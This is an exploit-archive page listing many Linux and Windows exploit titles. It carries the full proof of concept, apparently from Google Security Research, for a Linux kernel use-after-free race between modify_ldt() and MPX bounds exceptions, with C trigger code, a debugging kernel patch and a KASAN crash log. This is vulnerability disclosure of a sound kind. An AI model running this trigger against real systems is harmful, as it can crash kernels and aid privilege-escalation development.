Menu

Improved exploit search engine. Try it out

"Linux - Use-After-Free via race Between modify_ldt() and #BR Exception"

Author

"Google Security Research"

Platform

linux

Release date

2019-06-20

Release Date Title Type Platform Author
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-01 "PowerPanel Business Edition - Cross-Site Scripting" webapps linux "Joey Lane"
2019-07-01 "Linux Mint 18.3-19.1 - 'yelp' Command Injection" remote linux b1ack0wl
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-20 "Linux - Use-After-Free via race Between modify_ldt() and #BR Exception" dos linux "Google Security Research"
2019-06-18 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" local linux "Guy Levin"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-11 "Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)" remote linux AkkuS
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-06-05 "Exim 4.87 < 4.91 - (Local / Remote) Command Execution" remote linux "Qualys Corporation"
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-04 "Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution" local linux Arminius
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
2019-04-23 "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition" dos linux "Google Security Research"
2019-04-23 "systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit" dos linux "Google Security Research"
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-08 "CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting" webapps linux DKM
2019-04-08 "Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation" local linux cfreal
Release Date Title Type Platform Author
2019-07-12 "Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation" local windows "Google Security Research"
2019-07-12 "Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readEncoding" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Interpreter Stack Underflow in OpenType Font Handling Due to Missing CHKUFLOW" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack-Based Buffer Overflow in do_set_weight_vector_cube for Large nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth" dos windows "Google Security Research"
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-10 "Microsoft Windows - Font Subsetting DLL Heap-Based Out-of-Bounds Read in MergeFonts" dos windows "Google Security Research"
2019-06-26 "Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion" dos multiple "Google Security Research"
2019-06-24 "Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation" dos windows "Google Security Research"
2019-06-24 "Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation" dos windows "Google Security Research"
2019-06-20 "Linux - Use-After-Free via race Between modify_ldt() and #BR Exception" dos linux "Google Security Research"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-29 "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL" dos android "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47015/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/47015/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47015/41421/linux-use-after-free-via-race-between-modify-ldt-and-br-exception/download/", "exploit_id": "47015", "exploit_description": "\"Linux - Use-After-Free via race Between modify_ldt() and #BR Exception\"", "exploit_date": "2019-06-20", "exploit_author": "\"Google Security Research\"", "exploit_type": "dos", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
/*
When a #BR exception is raised because of an MPX bounds violation, Linux parses
the faulting instruction and computes the linear address of its memory operand.
If the userspace instruction is in 32-bit code, this involves looking up the
correct segment descriptor and adding the segment offset to the address.

(Another codepath that computes the linear address of an instruction is UMIP,
but I think that requires processors >= Cannon Lake, and my PC isn't that new.)

get_desc() locks the mm context, computes the pointer to the LDT entry, but then
drops the lock again and returns the pointer. This means that when the caller
actually accesses the pointer, the pointer may have been freed already.

This bug was introduced in
<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=670f928ba09b>
("x86/insn-eval: Add utility function to get segment descriptor", first in 4.15).


To make this easier to hit, I patched a sleep into my kernel:


================
diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
index cf00ab6c66210..5d9c59a28c76f 100644
--- a/arch/x86/lib/insn-eval.c
+++ b/arch/x86/lib/insn-eval.c
@@ -7,6 +7,7 @@
 #include <linux/string.h>
 #include <linux/ratelimit.h>
 #include <linux/mmu_context.h>
+#include <linux/delay.h>
 #include <asm/desc_defs.h>
 #include <asm/desc.h>
 #include <asm/inat.h>
@@ -670,6 +671,8 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
        if (!desc)
                return -1L;
 
+       mdelay(1000);
+
        return get_desc_base(desc);
 }
================

I also built the kernel with KASAN and full preemption.


Then I ran the following test program, compiled with
"gcc -m32 -mmpx -fcheck-pointer-bounds -o mpx mpx.c -pthread":

===============
*/

#define _GNU_SOURCE
#include <ucontext.h>
#include <stdio.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/prctl.h>
#include <err.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/ldt.h>
#include <pthread.h>

unsigned long blah;

void post_bounds_label(void);

static void do_ldt(void) {
  struct user_desc desc = {
    .entry_number = 0,
    .base_addr = (unsigned long)&blah,
    .limit = 0xffffffff,
    .seg_32bit = 1,
    .contents = 0,
    .useable = 1
  };
  if (syscall(__NR_modify_ldt, 0x11, &desc, sizeof(desc)))
    err(1, "modify_ldt");
}

void *ldt_thread(void *dummy) {
  while (1) do_ldt();
}

jmp_buf jumpy;
void handle_segv(int sig, siginfo_t *info, void *uctx_) {
  if (info->si_addr != &blah) {
    printf("addr=%p\n", info->si_addr);
  }
  ucontext_t *uctx = uctx_;
  uctx->uc_mcontext.gregs[REG_EIP] = (unsigned long)post_bounds_label;
}

int main(void) {
  do_ldt();
  pthread_t thread;
  if (pthread_create(&thread, NULL, ldt_thread, NULL)) err(1, "pthread create");

  struct sigaction act = {
    .sa_sigaction = handle_segv,
    .sa_flags = SA_NODEFER|SA_SIGINFO
  };
  if (sigaction(SIGSEGV, &act, NULL)) err(1, "sigaction");

  while (1) {
    unsigned long mpx_bounds[2] = { 5, 6 };
    unsigned long old_bounds[2];
    asm volatile(
      "bndmov %%bnd0, (%0)\n"
      "bndmov (%2), %%bnd0\n"
      "mov %1, %%fs\n"
      "bndcl %%fs:(%3), %%bnd0\n"
      "bndcn %%fs:(%3), %%bnd0\n"
      "post_bounds_label:\n"
      "bndmov (%0), %%bnd0\n"
    : /*out*/
    : /*in*/
      "r"(old_bounds),
      "r"(0x7),
      "r"(mpx_bounds),
      "r"(0x0UL)
    );
  }
}
/*
jannh@laptop:~/mpx$ 
===============

The program started printing various hex numbers, and I immediately got this
KASAN splat:

===============
[ 3129.003397] ==================================================================
[ 3129.003411] BUG: KASAN: use-after-free in insn_get_seg_base+0x9a/0x110
[ 3129.003416] Read of size 2 at addr ffff8883775da002 by task mpx/13947

[ 3129.003425] CPU: 1 PID: 13947 Comm: mpx Not tainted 5.2.0-rc2+ #10
[ 3129.003427] Hardware name: [...]
[ 3129.003429] Call Trace:
[ 3129.003436]  dump_stack+0x71/0xab
[ 3129.003441]  ? insn_get_seg_base+0x9a/0x110
[ 3129.003446]  print_address_description+0x6a/0x250
[ 3129.003450]  ? insn_get_seg_base+0x9a/0x110
[ 3129.003454]  ? insn_get_seg_base+0x9a/0x110
[ 3129.003458]  __kasan_report+0x14e/0x192
[ 3129.003463]  ? insn_get_seg_base+0x9a/0x110
[ 3129.003467]  kasan_report+0xe/0x20
[ 3129.003471]  insn_get_seg_base+0x9a/0x110
[ 3129.003476]  get_seg_base_limit+0x181/0x4a0
[ 3129.003482]  insn_get_addr_ref+0x18f/0x490
[ 3129.003486]  ? insn_get_opcode.part.4+0x16d/0x350
[ 3129.003490]  ? insn_get_modrm_rm_off+0x60/0x60
[ 3129.003496]  ? insn_get_modrm.part.5+0xce/0x220
[ 3129.003501]  ? insn_get_sib.part.6+0x60/0xc0
[ 3129.003505]  ? insn_get_displacement.part.7+0xe3/0x1d0
[ 3129.003509]  ? insn_get_immediate.part.8+0x52/0x710
[ 3129.003514]  ? preempt_count_sub+0x14/0xc0
[ 3129.003517]  ? preempt_count_sub+0x14/0xc0
[ 3129.003523]  mpx_fault_info+0x1bc/0x2d0
[ 3129.003528]  ? trace_event_raw_event_bounds_exception_mpx+0x170/0x170
[ 3129.003535]  ? notify_die+0x7d/0xc0
[ 3129.003539]  ? atomic_notifier_call_chain+0x40/0x40
[ 3129.003543]  ? __ia32_sys_rt_sigaction+0x1c0/0x1c0
[ 3129.003547]  ? preempt_count_sub+0x14/0xc0
[ 3129.003550]  ? preempt_count_sub+0x14/0xc0
[ 3129.003556]  do_bounds+0x24d/0x350
[ 3129.003560]  ? do_double_fault+0x160/0x160
[ 3129.003565]  ? fpregs_assert_state_consistent+0x54/0x70
[ 3129.003570]  ? bounds+0xa/0x20
[ 3129.003574]  bounds+0x14/0x20
[ 3129.003578] RIP: 0023:0x565e98e7
[ 3129.003583] Code: c7 85 64 ff ff ff 06 00 00 00 8d 85 58 ff ff ff b9 07 00 00 00 8d 95 60 ff ff ff bb 00 00 00 00 66 0f 1b 00 66 0f 1a 02 8e e1 <64> f3 0f 1a 03 64 f2 0f 1b 03 66 0f 1a 00 f2 e9 7c ff ff ff 55 89
[ 3129.003585] RSP: 002b:00000000ffdca1f0 EFLAGS: 00010286
[ 3129.003588] RAX: 00000000ffdca230 RBX: 0000000000000000 RCX: 0000000000000007
[ 3129.003591] RDX: 00000000ffdca238 RSI: 0000000000000001 RDI: 00000000ffdca2cc
[ 3129.003593] RBP: 00000000ffdca2d8 R08: 0000000000000000 R09: 0000000000000000
[ 3129.003595] R10: 0000000000000000 R11: 0000000000000286 R12: 0000000000000000
[ 3129.003597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000

[ 3129.003606] Allocated by task 13948:
[ 3129.003611]  save_stack+0x19/0x80
[ 3129.003615]  __kasan_kmalloc.constprop.8+0xa0/0xd0
[ 3129.003618]  kmem_cache_alloc_trace+0xcc/0x5d0
[ 3129.003622]  alloc_ldt_struct+0x39/0xc0
[ 3129.003625]  write_ldt+0x236/0x5d0
[ 3129.003628]  __ia32_sys_modify_ldt+0x50/0xc0
[ 3129.003632]  do_fast_syscall_32+0x112/0x390
[ 3129.003635]  entry_SYSENTER_compat+0x7f/0x91

[ 3129.003639] Freed by task 13948:
[ 3129.003644]  save_stack+0x19/0x80
[ 3129.003647]  __kasan_slab_free+0x105/0x150
[ 3129.003650]  kfree+0x82/0x120
[ 3129.003653]  write_ldt+0x519/0x5d0
[ 3129.003656]  __ia32_sys_modify_ldt+0x50/0xc0
[ 3129.003659]  do_fast_syscall_32+0x112/0x390
[ 3129.003664]  entry_SYSENTER_compat+0x7f/0x91

[ 3129.003669] The buggy address belongs to the object at ffff8883775da000
                which belongs to the cache kmalloc-32 of size 32
[ 3129.003674] The buggy address is located 2 bytes inside of
                32-byte region [ffff8883775da000, ffff8883775da020)
[ 3129.003677] The buggy address belongs to the page:
[ 3129.003683] page:ffffea000ddd7680 refcount:1 mapcount:0 mapping:ffff8883d0c00180 index:0xffff8883775dafc1
[ 3129.003686] flags: 0x17fffc000000200(slab)
[ 3129.003692] raw: 017fffc000000200 ffffea000f0692c8 ffffea000d4bb988 ffff8883d0c00180
[ 3129.003696] raw: ffff8883775dafc1 ffff8883775da000 000000010000003f 0000000000000000
[ 3129.003698] page dumped because: kasan: bad access detected

[ 3129.003701] Memory state around the buggy address:
[ 3129.003706]  ffff8883775d9f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 3129.003711]  ffff8883775d9f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 3129.003715] >ffff8883775da000: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
[ 3129.003718]                    ^
[ 3129.003723]  ffff8883775da080: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
[ 3129.003727]  ffff8883775da100: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
[ 3129.003730] ==================================================================
[ 3129.003733] Disabling lock debugging due to kernel taint
===============

I'll send a suggested patch ("[PATCH] x86/insn-eval: Fix use-after-free access to LDT entry") in a minute.
*/